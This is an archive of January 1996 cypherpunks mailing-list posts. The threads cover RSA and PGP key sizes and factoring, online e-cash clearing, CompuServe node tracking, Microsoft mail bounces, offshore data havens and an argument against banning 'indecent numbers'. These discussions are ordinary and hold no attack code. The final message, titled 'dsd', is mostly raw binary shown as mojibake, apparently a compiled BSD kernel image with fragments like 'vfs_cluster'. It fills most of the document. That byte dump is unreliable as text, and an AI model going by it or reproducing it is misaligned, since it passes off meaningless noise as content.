W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don Gaffney <gaffney@emba.uvm.edu>
Date: Fri, 5 Jan 1996 03:51:53 +0800
To: Thomas Massengale <thomas@inch.com>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <v02130502ad119c1ab80f@[205.231.67.43]>
Message-ID: <Pine.3.89.9601041016.C18262-0100000@griffin.emba.uvm.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 4 Jan 1996, Thomas Massengale wrote:

> At 3:17 PM 1/3/96, Mark M. wrote:
> 
> >I really don't see the point of using a key larger than 2048 bits.  Any larger
> >key would actually be harder to factor than brute forcing the IDEA keyspace.
> 
> the world will never need more than 640K of RAM?

A paraphase of Bill Gates in 1981:

"640K ought to be enough for anybody."

However, DRAM technology and use can't really be compared to the fundamental
mathematical problem posed by factoring prime composites. Stuffing more
gates on a chunk of silicon is just an engineering problem. Correct me
if I'm wrong, but I don't think much has happened with primes since
Legendre (1752-1833). 
_____________________________________________________________________
Don Gaffney
Engineering, Mathematics & Business Administration Computer Facility
University of Vermont
237 Votey Building
Burlington, VT  05405
(802) 656-8490
Fax: (802) 656-8802





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff klein <geoff@commtouch.co.il>
Date: Fri, 5 Jan 1996 00:04:17 +0800
To: cypherpunks@toad.com
Subject: Trying to init security channel
Message-ID: <9601041111.AA25508@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain


	This message was sent by Pronto Secure Mail.
	Without Pronto you can not establish a secure channel.

	Please send a reply manually.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 5 Jan 1996 05:49:42 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Starting an e-cash bank
Message-ID: <v02120d1fad11eb9da339@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 1/4/96, Scott Brickner wrote:

>Wait a minute.  I can see how one needn't be a bank to convert ecash
>into pcash, but going the other way requires that the cash be
>transferrable in ways that Digicash isn't.
>
>If I withdraw ecash from the bank, it's marked so I'm the one who's
>identified if it's double-spent.  If I give the cash to someone else
>(different from paying it to them, which requires they have an account)
>they're free to double-spend with (relative) impugnity.

Present day Ecash is bases on online clearing. I does not encode any user
idendifiying information into the coin. You are thinking of offline Ecash.
Besides, wherer users get the Ecash from, be it by putting money into their
account at MT or buying it from you doesn't matter. They still need an
account with MT.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 5 Jan 1996 03:55:16 +0800
To: Tony Iannotti <tony@secapl.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <v02140a09ad1122805d62@[165.254.158.229]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:30 1/3/96, Tony Iannotti wrote:

>On Wed, 3 Jan 1996, Robert A. Rosenberg wrote:
>
>> CIS always knows where you are dialing in from. Here is the start of a
>> typical connection (using the Mac Program NAVIGATOR).
>>
>> >0001NUH
[snip]
>> That NUH identifies that I am calling in via a V34 Node in NYC and the T01
>> says I got the first modem on the Rotory. If CIS wanted to restrict access
>> via the NYS nodes, that NUH would be an adequate flag to trigger this
>> action.
>
>Wouldn't this require some software routines added to check for this?  I
>expect the decision to build or buy is what CIS is now weighing. Also, I
>would imagine that a German could always call a POP outside the country if
>they wanted to pay for it..... (note that I am still not in favor of the
>action, but these are probably CIS's considerations.)

Yes it would require that the Node be checked in the Software. What I was
responding to was a claim that there is no way of telling where I am
connecting from (which I disproved). As to calling a non-German Node, that
is always an option.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Fri, 5 Jan 1996 04:14:57 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <v02140a09ad1122805d62@[165.254.158.229]>
Message-ID: <Pine.A32.3.91.960104135256.4920J-100000@fred.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jan 1996, Robert A. Rosenberg wrote:

> Yes it would require that the Node be checked in the Software. What I was
> responding to was a claim that there is no way of telling where I am
> connecting from (which I disproved). As to calling a non-German Node, that
> is always an option.

Yes, I agree. I think the real difference is that they really cannot tell
where you are calling from, even though they know where you are
connecting. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 5 Jan 1996 04:19:57 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft has a way to go on E-Mail
Message-ID: <v02120d01ad11d3accf3d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) said,

>Either Microsoft handles undeliverable mail different from most other
>places, ...

I believe that this is what Mr. Bill called "Eating your own dog food."

;-)

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Fri, 5 Jan 1996 06:41:29 +0800
To: "nobody@REPLAY.COM>
Subject: RE: Guerilla Internet Service Providers
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960104140425CU007300@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'm game. What is the story behind your .sig? Given the obvious 
reluctance state it fully, perhaps someone else can reply?

|We Jurgar Din
|(that will have to suffice: I do not yet live in a free country)

----------
From: 	nobody@REPLAY.COM[SMTP:nobody@REPLAY.COM]
Sent: 	Thursday, January 04, 1996 9:07
To: 	cypherpunks@toad.com
Subject: 	Re: Guerilla Internet Service Providers

-----BEGIN PGP SIGNED MESSAGE-----

"L. Malthus" wrote:

> I was told that Belize is offering passports for the next 
> two years for $50,000 and that might be even less if offers 
> were made to the government to provide low cost Internet 
> access to the citizens of Belize.
> 
> http://www.belize.com/citzdoc.html
> 
> Belize has always been known as a home for pirates, A 
> wonderful Cypherpunk candidate for an offshore data haven!

Belize is a shit hole that is as willing as many other slimeball 
countries to deny someone entry and force them kicking and 
screaming onto the next flight to the U.S. on request from 
U.S. authorities. In principle, that is kidnaping. They use the 
technicality that the person never entered their territory. No- 
man's lands of port zones where the most basic rights may be 
violated without regard to a country's constitution are another 
class of abuse that will have to go.

Belize is also the place where Bob White, publisher of The Duck 
Book and sponsor of some of the largest hard-money conferences 
ever held, was murdered.  The usual suspects were not even 
rounded up.

Someone once wrote that the principle cash crop of Belize is lice. In 
reality it may be principles. At least the Hondurans 
got angry when a citizen was kidnaped by the U.S.


We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMOt2E0jw99YhtpnhAQHa7gH/Z4cjIcT50+0lxJTF7lHCfcPvSPzXW5BU
Yuea9C5s+1KgNDUYDe2ItTfOf3TTb+2deJGbDgf2TEP+A/q5S+9JHw==
=H46M
-----END PGP SIGNATURE-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 5 Jan 1996 04:25:41 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Microsoft has a way to go on E-Mail
In-Reply-To: <ad115e4402021004c68c@[205.199.118.202]>
Message-ID: <199601041910.OAA00206@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> It looks to me as if Microsoft has a way to go on e-mail. Every message I
> send to the list generates long bounce messages sent back to me. I assume
> others are getting the same thing.

The problem is that microsoft has made the mistake of using their own
software, which doesn't understand the distinction between envelope
and header addresses. I've been on the phone with contacts there and
I'm going to start threatening going to the press soon.

Virtually every mailing list I use has this problem, by the way --
they are a big place.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cedric Tefft <CedricT@datastorm.com>
Date: Fri, 5 Jan 1996 05:10:59 +0800
To: "'smtp:cypherpunks@toad.com>
Subject: Re: 2047 bit keys in PGP
Message-ID: <30EC5109@ms-mail.datastorm.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: owner-cypherpunks
> To: cypherpunks
> Subject: Re: 2047 bit keys in PGP
> Date: Thursday, January 04, 1996 11:29AM
>
> In article <v02130503ad119cbfdece@[205.231.67.43]>,
> netdog <netdog@dog.net> wrote:
> >nobody will ever need more than 640K or RAM?  i wouldn't underestimate 
the
> >ability of technology to grow at a pace that is beyond our wildest
> >dreams-especially with this network serving as a virtual office/lab.  of
> >course, ymmv.
>
> Order of magnitude check:
>
> There is a very well-defined limit to the size of key that can be broken 
by
> brute force, independent of your "wildest dreams" as to the growth of
> technology.  It's the Laws of Thermodynamics.

[snip]

No law says the attack has to be brute force.  What about the birthday 
attack, differential cryptanalysis, etc?  True, I believe neither of those 
examples are applicable to RSA, but factoring is, and it's _much_ more 
efficient than brute force searches.  There might be other algorithems out 
there (or as yet undiscovered) that are more efficient than current 
factoring algorithms are (or ever hope to be).  If your attacker has an 
algorithm whereby he has to search less than the full keyspace, he has 
effectively reduced the size of your key.  Essentially, his attack is the 
same order of magnitude as a brute force search of this new reduced keyspace 
(call it "effective" keyspace for convenience).  The greater difference 
between the effective keyspace and the real keyspace (determined by his 
cracking algorithm), the larger I need to make my real key to compensate. 
 If his algorithm effectively cuts my keyspace in half, I need to make it 
twice as large as I would need if my attacker's best algorithm were brute 
force.

>And they strongly imply that brute-force attacks against 256-bit keys will 
be infeasible
> until computers are built from something other than matter and occupy
> something other than space."

Hmmm... Well, the 384-bit Blacknet PGP key was cracked in just a few months. 
 How?  Certainly parallelism helped, but the main reason is that they were 
factoring keys rather than searching the full keyspace by brute force.  I 
don't know about you, but I'm certainly not going to stop increasing the 
size of my key simply because it can't be cracked by brute force.

 - Cedric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rudi Raith <rra@feilmeier.de>
Date: Thu, 4 Jan 1996 21:35:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601041317.OAA04812@aws26.muc.feilmeier.de>
MIME-Version: 1.0
Content-Type: text/plain


Some thoughts on the possibility or well-definedness
of banning specific (indecent?) contents on the net (or elsewhere):


1)

All contents (files) can be seen as natural numbers.
(Use your favourite encoding function.)


2)

I suppose that there is a predicate indecent_p(n), which is true if n
represents something indecent, false otherwise. (Some implementation
of such a predicate could be a police officer arresting you upon
presentation of the number to him, yielding true. :-) ) Such numbers
may be called "Indecent Numbers", their "posession", "transfer",
etc. be banned.


3)

Every natural number n can be perceived as the encryption of every other
one m (including itself) by some function enc. n = enc(m). 
(Proof by cardinality)

Examples:

Trivial enc: "If the number is n, return m."

Not so trivial enc: "Take m as a one time pad to encrypt n."


4)

As a consequence, every natural number can be perceived as the
encryption of an Indecent Number, hence should be banned, shouldn't it?


5)

The decimal representation of any irrational number (e.g. pi, e)
contains the decimal representation of every natural number
somewhere. (Proof by diagonalization.) Hence the algorithm for creating
this decimal representation should be banned, too, shoudn't it?


6)

Finally I hope this shows what great an achievement to legislation
and jurisdiction such banning might become, once established. 
This creates a universal crime (or vice?), everybody is guilty of 
automatically without the tedious procedure of seeking evidence. 
(maybe those not knowing about numbers at all be exempt?)


Virtually Yours,

Rudi Raith (raith@feilmeier.de)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 5 Jan 1996 04:39:06 +0800
To: cypherpunks@toad.com
Subject: USENIX anyone?
Message-ID: <199601041931.OAA04745@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to be at the USENIX conference in San Diego later this month,
as are, I suspect, many other crypto/cypherpunk types.

Any interest in a crypto BOF?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FreeBSD user <fb@sponsor.octet.com>
Date: Fri, 5 Jan 1996 04:53:44 +0800
To: cypherpunks@toad.com
Subject: dsd
Message-ID: <199601041434.OAA09010@sponsor.octet.com>
MIME-Version: 1.0
Content-Type: text






Ç$°
óÃ

Â
ðÂ‰Ü3ð1/4Ðÿ¿ï1À‰Å¡¨°ð‰p¶
¸



1ÀeÔ[^_ÉÃ



¸
tF@9ÁsEA€9
uö‰ÏN€~ t
€~	u
A€9 tú€9	tõS.ë
€9	tŠˆAB9ùs€9 uìÆ




¸
)Î‰µDúÿÿÿ...@úÿÿ‹Húÿÿ9@úÿÿrÏ‹•Púÿÿ•@úÿÿ9•lúÿÿs‹µlúÿÿ9µPúÿÿs
+µPúÿÿ‰µ@úÿÿ"
¸
Äÿµðúÿÿÿµøúÿÿÿµôúÿÿÿµüúÿÿÿuè1/2õÿÿƒÄ...Àu"ÿµüúÿÿÿuè|õÿÿÿµôúÿÿÿuènõÿÿ1Àë
¸
ÑîKƒûwÿ7‹GÿÐƒÄƒøÿtE‰ÙÓà	ÆƒÃƒûvã‰ðƒàÁî‰w
ƒÃþ‰_ƒøu	Wèkúÿÿë'...ÀuWèê÷ÿÿëƒøt¸

hö#ðèÆ


1ÀéR
UØR‹UÂË


ÇXÀð

$
h‡5ðè"¸
1Àé˜
u‹V ‹R(‹M‰1ÀéT
u‹v ‰u¸‹M
‹Q‰V(1Àé
...
t
¸	
VWèÐð
fƒøt
fƒøtë*QE Pÿr ècS
fƒøt
fƒøtë*QE Pÿr è"R
fƒút"fƒúuHƒyt
¸
ÇEø2
uafÇEþ
t
¸-
fÇEü
¸	


´

h<Nðè¬š
h°NðèØ(tm)
jWèÆ
ÿ2èžè



öF(t€K(ƒ}

K
À"
¿
‰N0‹B(‰F4‹B(‹@‰F8j
¸
¸
ƒøtë7jõ
ÇEü
hqoðè°}
j(ÿuøè§

j(ÿuøès

‹Eøfƒxu
‹Eøë
‹Eø‹PëÈ1À‹]ôÉÃlf_findoverlap: default
éiÿÿÿ‹}ø9yu‹Uü9Qu
9Y
u	9q"*ÿÿÿ‹}ü9y>‹Uü9Qu‹}ø9yw.ƒûÿuƒþÿt$9q|
u9Y
s
ƒy
ÿuƒyÿu
¸
¸
¸

‹]äƒ{
K8ƒÄ...Éu‹S$öÆtV‹}‹‹uè)Lò‹
ò)O‰Î‰÷Áÿ‰ò‰ù‹}WO
‹S$öÆ...Oþÿÿ‹‹uèƒ|ñ
...Ét‹B‰A‹B‰j)Rè-öÿÿ1Àë@...öu1Àë3hÌ‡ðèþe
‰Z‰‰z‰r
‰ðeô[^_ÉÃ
¸
‹C0‰Fë.‹F9C0t$PèûÿÿƒÄ...Àt
‹-Ü
9st9suƒÿÿt!9{t9{t‹Eú
‹‹@9Ct‹‹@‰C‹UJ(
9{
t9{uƒþÿt!9s
t9st‹Eú
‹‹@
9C
t‹‹@
‰C‹UJ(
1ÀÉÃ¸
u
jRèõìÿÿƒÄ‰
‹€Ü
...ÀtéÝ
¸
¸
ƒøtéŒ
¸
¸
u,‹S9Vs$‹UÂú
u;
u;
ƒþ	tƒþu
¸

!ƒÄ
ƒþ	tƒþu
¸

WSè§
£¨
<tvéÉ
‰ð÷Ð!ƒ¨

öC)"
ƒøteë_ƒ{0~u÷Ç



f1/2^ÿÿÿt
"

Sÿ6ÿuëSÿuÿ6èáT

ƒútë+Qÿ3èŒV

ëQÿ3èxV

eð[^_ÉÃ
v
¸

‡¨
¸
¸
¸
RQÿuèA

À...
ÇƒL
[^_ÉÃ
¸
‹RPPè
)‹R)PPè
cleaning up... 
ÿ3è;÷





¸
ƒà@Å
JˆJ‹]üÉÃ


¸






QˆQ1ÀeÜ[^_ÉÃ
ƒã‰÷ƒç
‹M
...Òt9Zv
[¶DÂ£ør*j








Ð‹uü‰DžCƒû}~Å‹uüÇDžÿÿÿÿ‹Eüeð[^_ÉÃbad sector table corrupted
ÇEüäéð‹C$öÄtƒÆƒþ		9w,‡DÿÿÿÇC$ 


Sè	

ÇEñðÆEð 1öë...Û"8

Ç`ýð
Ç`ýð

VèT>ÿÿëR‹VÂÀ
ƒøtƒø#u1À+]ð‹}‰eÌ[^_ÉÃ
ƒûtƒû#u1Û+uð‹M‰1ƒ}˜
jÿu˜èô|ÿÿ‰ØeŒ[^_ÉÃ
ƒûtƒû#u1Ûƒû u
j
ÿuèh¥ÿÿ+uð‹}‰7‰ØeÌ[^_ÉÃ
ƒûtƒû#u1Ûƒû u
j
ÿuè4¤ÿÿƒÄ+uð‹M‰1ƒ}˜
jÿu˜èõzÿÿ‰ØeŒ[^_ÉÃ
u‹F ‰P(1Ûéó
"
u1Û‹F ‹@(‹tÿÿÿ‰ët‹Fÿuÿµtÿÿÿhwt@V‹@ÿÐ‰Ã‹tÿÿÿ÷ƒÄëK‹FÿuÿµtÿÿÿWV‹@ÿÐÃÄ...Ûu-÷Ç
¸
Ã
¸

¸
¸
ùf@tNë|ù	s@tXërƒ;
VSQè<ú
t*öCu$fƒ{$




9:ð
h/ðèÛ×ÿÿ¿N
‹äÕðf‹Jf¡ˆ"ðf‰Jf‹F
f£ˆ"ðÿ(tm)ðf‰^
·F9Œ:ðf‹=Œ:ðf)~ë"fÇF
ÿt
hMðèw×ÿÿ¡Ð...ð‰5Ð...ðeô[^_ÉÃmsg_cbytes is screwed up
·C9Â...b
h&ðèDÖÿÿÇF 
¸
¸
ÇC
Áâ·Æ	Â‹M‰1Àeð[^_ÉÃmsgwait
·G9Â...î
‹EðéY
h·ðèPÑÿÿ9=(tm)ð}
hÒðè>Ñÿÿ‹EøF9F s
hîðè'Ñÿÿ=Ð...ð
h-ðè
ÿÿf‹Møf‰H...ÿŽ"
hLðè¬Ðÿÿf‹ˆ"ðfƒûÿ
h]ðè•Ðÿÿ¿Ã9:ð
hmðèÐÿÿ¿Ã‰Eä‹äÕðf‹
Bf‰
ˆ"ðÿ
(tm)ð‹Eìf‹@
‹Mäf‰J‹Eìf‰X
O...ÿmÿÿÿj‹EìƒÀPÿuüèØè
ƒ}ø
h§ðèhÏÿÿffÿýƒ~ 
‹M
·A9Â...9
öEñ"D
öEñ"ì
‹M
·A9Ât
¸
f‰MèÇEì
h ðè´Ëÿÿ¿Eè9:ð
h ðèžËÿÿÿuàÿuü¿Eè¯Œ:ð°ÎðPè"ã

ƒøt
ë#‰
ÔÇðë)ÇÔÇð
¸
u	¸
‹u
·F9Â...Ö
‰E¸é
f@€äf‰D
f‰tÇD
Áâ·Ã	Â‹}‰1Àeè[^_ÉÃsemwait
‹M
·A9Â...Ð

ëfÿFj
‹M
·A9Ât
¸
é þÿÿfÿNé-þÿÿƒ}Ä
hß.ðèP1/4ÿÿKy1/21Û9]ÔŽ˜ýÿÿ[À·0‹MÐ‹I‰M¸Rf‹D0f)'C9]ÔÜémýÿÿÿEÌ‹MÔ9MÌŒ%ÿÿÿÇEÌ
hÎ2ðè"ºÿÿ‹]ð·C9Á|
hì2ðèºÿÿƒ}ô
‰ØÁè9Ât1Àë‰È‹]üÉÃ
¸
...À"Ž
Áâ·Ç	Â‹M‰1Àë¸
¸
hq:ðè³ÿÿ‰×ë‹=`×ðÇ`×ðÿÿÿÿÁà‰Ã<¯ðfÇC
f@€äf‰C
j
Áæ·Ç	Æ‰uüj
¸
SWè£÷ÿÿƒÄFƒÃ95L:ðäj‹G ÿ°Œ

Ç`ýð
9Æu5€y
ÿt/ƒ}ø
€y
ÿ...¸

u
‹MüöÁ@t3/4
èá$
t"‹Mô¶9Æt¶A9Æt¶A9Æu)þÿ
u.ö‡"
¸

Bë
ƒÂ€âø‰-Ä
t€m}
	t€Ü
‹Wh‹R
ë
º1u
¸
‹]üfƒ{
O\
¸
¸
¸
¸

@^tºZZðRh
t,‹µtþÿÿ¶9Ót¶V9Ót¶V9Óuûÿ


èîÞÿÿƒÄ¡
¦Œ
uUö†Œ
Nÿÿ‹]üÉÃ




h
lðë‹Gh‹X...Ûuh+lðWè_‚ÿÿé"
ƒøt9ëƒøt3‹Cl9Alr'‹Al9Clr
€y(
€y(
u
Vj
èsØÿÿƒÄVWèiØÿÿVèéÿÿƒÄ
‰
t€"=	t€}7=t€²
‹1/4Èðë
‹†¤
‹Áà	F`ë
‹Áà÷Ð!F`WVè

t€~b=t€t[é



1Àé¡
¸#

...ÉteéÀ


t€Jÿ	t€î

‹Fh‹@
ë1À‹M‰1Àéð
t€ÿ	t€}7ÿt€>ÿ}t€|6ë%ÿut€t
ÿt€tëÿt,€ÿt,€|€K@jVèxöÿÿƒÄ1Àö†

SèDÿÿÿë‰ØF
9F~‹^+^
‰Ø÷ØPè

‹
ƒÁ‰Kë
ÇC
ƒ}
‹
ƒÁ‰Kë
ÇC

hr‡ðè¨aÿÿ‹£PÊðÇ

hr‡ðèŒ_ÿÿ‹£PÊðÇ
¸
ÇˆÈð
ÿ¤Èðëÿ Èð‰Øeø[^ÉÃ
ÿ¤Èðëÿ Èð‰Øeø[^ÉÃ
Vèþÿÿ1ÀëIöFt#‹V‹N‰S‰Kf‹~fçf‰{{‰{
€fý‰3‰Þƒ}
cw
ºd
...öu"ƒ}

‹-é	
¸+
h?(r)ðè8?ÿÿ€KSèšþÿÿƒÄ‹Mü‰


P‹BÿÐÉÃsoaccept: !NOFDREF
uVèž
"%
uƒ}
‹E‹@‰Eôƒ}ô
ƒà‰Eð‹Bÿ@4ƒ}
¿ 
·y$éð
fƒà$fƒøu-öF
u@ƒ}ô
"œ
ƒ}ì
 tƒ}ô
ƒ}ô
...û
tÇEô9
"g
ƒ}ô

u
ƒ}ä
ƒ}ô
t€Mø‹MøöÁu?G0Pèd
tƒ
t‹Aƒx

j
‹
RQè
‹@ƒx
‹	ƒÁƒ9
huÍðèÀ ÿÿƒ}
‹[ƒ{
H‹
‹Rƒz

f‹Uüf	Vë
hÈÏðèöÿÿeð[^_ÉÃsbflush
hAÑðèäÿÿ‹]ü‹s‰uüéÙ

h¡Õðè@ÿÿ‹EøfÇ@

¸%
·^$fÇF$


‹@
ƒÀäë
‹EÔ‹@
ƒÀì+EÔƒø
v‹EÔƒ@
ôƒ@
ëj
ƒûtƒû#u1Ûƒû u
j
ÿuènËþÿƒÄ...Ûu+uð‹}‰7ƒ}Ø
¸(
¸(

ƒûtƒû#u1Û...Û...7
ëHÇEè
¸(
¸(
¸
j


€:wŠˆB‰ñˆ
‰øeô[^_ÉÃU‰å‹E‹U
‹M9Pv	‹
¸	
u	‰1ÀÉÃ¸&
¸-
ƒ}

ƒ~

ÇEü7
hÞéðèÿÿ‹F
‹ƒ}
tEöCtj
¸)
u)S ...Òt"‹B
x<Ëðuö@
thLøðÿrDèÝ
‰-ƒÆGfÿC
Ó...Ûu×uü_ÿ...Û|‹ÿp èÒÉÿÿƒÄƒÆKyíuü_ÿ...Û|j

h8þðèüïþÿC$öÄ ...Š
Sèˆ


G$%þÿÿëG$(c)
hFÿðèÀíþÿƒx
hYÿðè°íþÿƒ¿Ì
htÿðèLíþÿ‹Mð‰œŒ
èþÿfð...Ûtƒ{(t
hÌðèîçþÿ...Ûu(Çdð
ð‹E
PSèLªþÿÄ...Àt1/2‹uô‰5
ïÿÿƒÄ‹u9s4tGC$(c)
ƒ}






èÿÿë‹U‹B$%ÿÿÿ‰B$Rè`¡þÿƒÄ‹Mü‰


€b0¿Rè´Ÿþÿeì[^_ÉÃU‰åƒìWVS‹MA$(c)

‹C
£žð‹S
‹C‰¡
‹C
£žð‹S
‹C‰ÇC
‹‹@
£žð‹‹P
‹@‰‹¡
‹EäéÀ
ÿuè´Ñÿÿ‹]Ø‰sD‹M‹QL‰SLeÌ[^_ÉÃvfs_cluster: warning: buffer already busy



¸
‹uÐfÿßÿÿ‹M‹A€8
‹M‰YfÿC‹u‰^‹MÐöA
uÇEø˜µð‰]ü‹
˜µð‹SEøP‹ŠÿÐƒÄ‹uÐöF"A
h'=ðèX°þÿÇEèÜ°ð‰}ì‹]
‰]ð‰uô‹
Ü°ð‹WEèP‹ŠÿÐ‰EÜƒÄ...Àt-øþ...Ä






ÿuüè^þÿÿë
h5Bðèò­þÿeð[^_ÉÃ
h5FðèŒ§þÿ‹MA,...ÀtöE
t
ƒxH
ƒ{H
h\Fðèœ¥þÿ1ÀeÜ[^_ÉÃbgetvp: not free
hyIðèÌ¤þÿ¡
Ç

Z‰<^ð‰8^ðÇB 8^ð"ÿÿÿë!ÇB
hÂOðèxþÿ...öt	SèýÿÿƒÄ¡(eð‰CÇC`
hÇQðèÔ›þÿöCtV1É‹C<‹
‹C £<^ð‹S ‹C‰¡8^ðC...Àt{‰x ë	{‰=<^ð‰8^ðÇC 8^ðÇC8

	

Í
Mð=|ð...ÿ"³
ƒz 
3/4
tsö
uWèHòÿÿ¸
töCuWè-òÿÿ¸-
ñÿÿ¸
¸
‹C£|ð‹S‹‰‹C
Ç@<
‹Mø‹U‰
1Àeè[^_ÉÃ

=
Pè<âÿÿë
ÿuÌèüáÿÿƒÄƒ}È
Sè`ßÿÿë
ÿuÌè ßÿÿƒÄSèßÿÿ‰ðe"[^_ÉÃ
¸	
t
¸
¸
f‰A
f‹B
f‰A
f‹Bf‰A
f‹Bf‰Aƒz4
"
"
"

3/4
3/4
ÊÿÿƒÄÿµxÿÿÿèüÉÿÿj
ÿu¤èÊúýÿƒÄ
ƒ}À
¸	
"
¸	
u	‰1ÀÉÃ¸
Pè¨Àÿÿë
‹}ÿwèeÀÿÿƒÄ‹MÇA
"
1/2|ÿÿÿfÿG1Àë
ÿµ|ÿÿÿèõ1/4ÿÿ‰Ø¥lÿÿÿ[^_ÉÃU‰å‹Eö
‹S‰V
‹S
‰V‹SD‰V‹S‹K‰V0‰N4‹S$‹K(‰V‰N‹S,‹K0‰V ‰N$‹S4‹K8‰V(‰N,‹S ‰V@‹S@‰VD‹S<‰VHj
1Àé3/4
hÒ-ðèhVþÿ‹Cƒx8u
1Àë¸

3/4
ƒ{
‹B‹@<‹
ÿ3èÉ*ÿÿƒÄöFtÿKu
ÿsè›*ÿÿƒÄ‹Uüfƒz~1Àë4ÿ3èÍ
ÿÿ‰ÆÿsèÃ
ÿÿ‰ÇjSèQßýÿ‹UüÇB<

PSèU1/4ýÿƒÄÇCL
ÿÿÿöC)uGéÿþÿÿ...Àu>€{,t8j


þÿ‰ÃƒÄ
‹Eà
¸

¸(
u
XþÆ3
ƒÃƒ;

ÿs
èþ×ýÿë¸à(tm)ð...Àu
¸
ûÿÿÉÃU‰å‹E‹PJƒúwmÿ$•¸±ðÜ±ðì±ðì±ð²ð²ðü±ð
²ð²ðì±ð‹@
Ç

j
ÿrèNÌýÿ1ÀÉÃ
ÇEð
ÇEðà(tm)ðƒ}ð
¸
fÿA1ÀéÔ
¸
ÇEÜà(tm)ðƒ}Ü
‹
˜µð‹W]øS‹ŠÿÒƒÄ‹G<¶H
IÁâ)Ê‹}ÿw
Vÿp
‹•œððÿÒ‰EØƒÄ
ÇEølµð‹uè‰uü‹
lµð‹VS‹ÿÒé(r)
ÿuìè
>ÿÿëÿuìèD=ÿÿƒÄƒ}Ø

´ýÿ‰ÃƒÄ
...Û"œ
ÿuVW‹CÿÐeô[^_ÉÃ
‹EƒÀ9Áu
1Àël‰Ï+}G‰}ôŠˆUø‰Mü1öë
¶3/4tBÐAŠÐ<	ví‹}üÆ

û
i €t6ëmþi €t,ëcþi ÀtD
þ
i Àt2ëMþi Àt8þi Àt8ë;‹Uü€z
û
i Àtë"ûi Àtûi Àu‹Uüf¶Jf‰Jë1Àeì[^_ÉÃ
‹EÄe¬[^_ÉÃ0123456789

‹V
ƒÂäë‹V
ƒÂì)òƒú
v
ƒF
òƒF
ëjj
VèÊþÿ‰ÆƒÄ
...ö""
‹
...ötVè*Èþÿ‹EðeÔ[^_ÉÃ
fK



‹uüƒ¦´
Ç†"
Ç†€
u‹W‹
Øfð‰
‹W‰ØfðÿœÈð£
1Àéî
ÇƒÀ
‹Ü^ð‰B£Ü^ðÿà^ð‹(
ˆÿƒ¨
t‹Rëé‹Rëä‰ÐÉÃU‰åVS‹]‹u‹E
fƒx
tŠ"P
t‹@ëá‹@ëÙeø[^ÉÃ
‰þ¶)Â‰UüCAÇEø
t
‹ëé‹ëâƒ
"
8t‹[ë‹[¿C9ÂwáÿuRÿuèáþÿÿ‰Eè‹P‹uð‹F
ŠN
"
8u	‹Mè‰Në
‹Mè‹uð‰N‹uè‰s‹Mð‰N‹F
ŠN
"
8u‰^ë
‹uè‰V‰^‰ÐeÜ[^_ÉÃrn_addmask: mask impossibly already in tree

‰}ð‹...ÿu¸9ßu4‰uÜ‹}‹Mð‰OŠA
ˆG
‹q‰w‰y9Nu‰~ë‰~‰û‹uÜë ‹}‹Uð‹B‰G‰z‰Wƒ




‹J
‹uø¶1...Øt‹uü¶1...Øt‹RëÔ‹RëÎ‹Uð¿r‰uôfƒz

h¢ðèPëýÿ¡äzð@Pÿ5|Dðèp
3/4-
3/4
3/4
3/49
]ØfÿC6ë(]Ø...ÛtCöC9t=ÇEÐ


PS‹@0ÿÐƒÄfƒ{6
h{	ðè\äýÿÿ
Hhðfƒ{6
h
